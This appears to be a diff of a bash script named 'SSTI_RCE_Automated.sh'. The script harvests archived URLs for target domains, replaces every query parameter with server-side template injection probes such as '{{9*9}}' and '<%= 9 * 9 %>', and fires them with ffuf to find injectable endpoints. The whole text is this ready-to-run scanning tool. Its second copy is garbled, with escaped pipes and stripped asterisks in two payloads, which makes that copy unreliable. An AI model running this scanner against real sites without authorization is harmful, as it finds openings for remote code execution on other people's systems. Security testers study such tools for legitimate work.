minkione · January 20, 2021 21:17
diff --git a/SSTI_RCE_Automated.sh b/SSTI_RCE_Automated.sh
 #!/bin/bash
 while read Line
 do
    echo "|||$Line"
    #  First grab the subdomain and check wayback for urls
    #  Replace each GET param in each URL with the template injection
    #  Use ffuf to request the URL and check if daman81 is in the response
    waybackurls "$Line" | sort -u | qsreplace -a 2> /dev/null | qsreplace "rce<%= 9 * 9 %>rce{{9*9}}rce{{9*'9'}}rce#{9*9}" 2> /dev/null  | grep rce > temp_file.txt && ffuf -u FUZZ -s -w temp_file.txt -mr "rce81|rce999999999" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)HackerOne Gecko/20100101 Firefox/81.0"

 done < "${1:-/dev/stdin}"
	#!/bin/bash
	while read Line
	do
	echo "\|\|\|$Line"
	# First grab the subdomain and check wayback for urls
	# Replace each GET param in each URL with the template injection
	# Use ffuf to request the URL and check if daman81 is in the response
	waybackurls "$Line" \| sort -u \| qsreplace -a 2> /dev/null \| qsreplace "rce<%= 9 * 9 %>rce{{99}}rce{{9'9'}}rce#{9*9}" 2> /dev/null \| grep rce > temp_file.txt && ffuf -u FUZZ -s -w temp_file.txt -mr "rce81\|rce999999999" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)HackerOne Gecko/20100101 Firefox/81.0"

	done < "${1:-/dev/stdin}"